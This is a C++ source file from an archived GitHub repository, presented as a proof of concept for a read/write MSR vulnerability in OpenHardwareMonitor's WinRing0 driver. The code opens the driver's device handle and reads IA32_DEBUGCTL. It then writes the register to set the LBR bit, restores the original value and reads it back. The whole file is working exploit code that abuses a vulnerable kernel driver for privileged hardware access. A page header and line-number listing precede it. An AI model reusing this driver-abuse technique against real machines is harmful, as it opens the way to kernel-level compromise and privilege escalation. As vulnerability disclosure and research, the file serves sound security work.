This repository has been archived by the owner on Dec 25, 2023. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 4
/
Copy pathmain.cpp
102 lines (71 loc) · 2.42 KB
/
main.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
#include <windows.h>
#include <iostream>
#include "openhardwaremonitor.h"
#define IA32_DEBUGCTL 0x1D9
int main( )
{
printf( "\n\tOpenHardwareMonitor R/W Msr Vulnerability PoC\n\n" );
printf( "[+] Setting Process Affinity Mask to 1 Core\n" );
if ( !SetProcessAffinityMask( GetCurrentProcess( ), 1 << 1 ) )
{
printf( "[!] Error Setting Process Affinity Mask!\n" );
system( "pause>nul" );
return 1;
}
printf( "[+] Opening Device Handle\n" );
auto h_device = CreateFileA( "\\\\.\\WinRing0_1_2_0", GENERIC_READ | GENERIC_WRITE, NULL, nullptr,
OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, nullptr );
if ( !h_device )
{
printf( "[!] Error Opening Device Handle, Probably the Driver isnt Loaded!\n" );
system( "pause>nul" );
return 1;
}
printf( "[+] Reading IA32_DEBUGCTL Msr\n" );
unsigned long long first_debugctl_msr_value;
if ( !ohm::read_msr( h_device, IA32_DEBUGCTL, &first_debugctl_msr_value ) )
{
printf( "[!] Error While Reading Msr!\n" );
CloseHandle( h_device );
system( "pause>nul" );
return 1;
}
printf( "[+] IA32_DEBUGCTL Msr Value: 0x%X\n[+] Setting LBR bit\n", first_debugctl_msr_value );
if ( !ohm::write_msr( h_device, IA32_DEBUGCTL, first_debugctl_msr_value | 0b1 ) )
{
printf( "[!] Error While Writing Msr!\n" );
CloseHandle( h_device );
system( "pause>nul" );
return 1;
}
printf( "[+] Reading IA32_DEBUGCTL Msr\n" );
unsigned long long second_debugctl_msr_value;
if ( !ohm::read_msr( h_device, IA32_DEBUGCTL, &second_debugctl_msr_value ) )
{
printf( "[!] Error While Reading Msr!\n" );
CloseHandle( h_device );
system( "pause>nul" );
return 1;
}
printf( "[+] IA32_DEBUGCTL Msr Value: 0x%X\n[+] Removing LBR bit\n", second_debugctl_msr_value );
if ( !ohm::write_msr( h_device, IA32_DEBUGCTL, first_debugctl_msr_value ) )
{
printf( "[!] Error While Writing Msr!\n" );
CloseHandle( h_device );
system( "pause>nul" );
return 1;
}
printf( "[+] Reading IA32_DEBUGCTL Msr\n" );
unsigned long long third_debugctl_msr_value;
if ( !ohm::read_msr( h_device, IA32_DEBUGCTL, &third_debugctl_msr_value ) )
{
printf( "[!] Error While Reading Msr!\n" );
CloseHandle( h_device );
system( "pause>nul" );
return 1;
}
printf( "[+] IA32_DEBUGCTL Msr Value: 0x%X\n", third_debugctl_msr_value );
CloseHandle( h_device );
system( "pause>nul" );
return 0;
}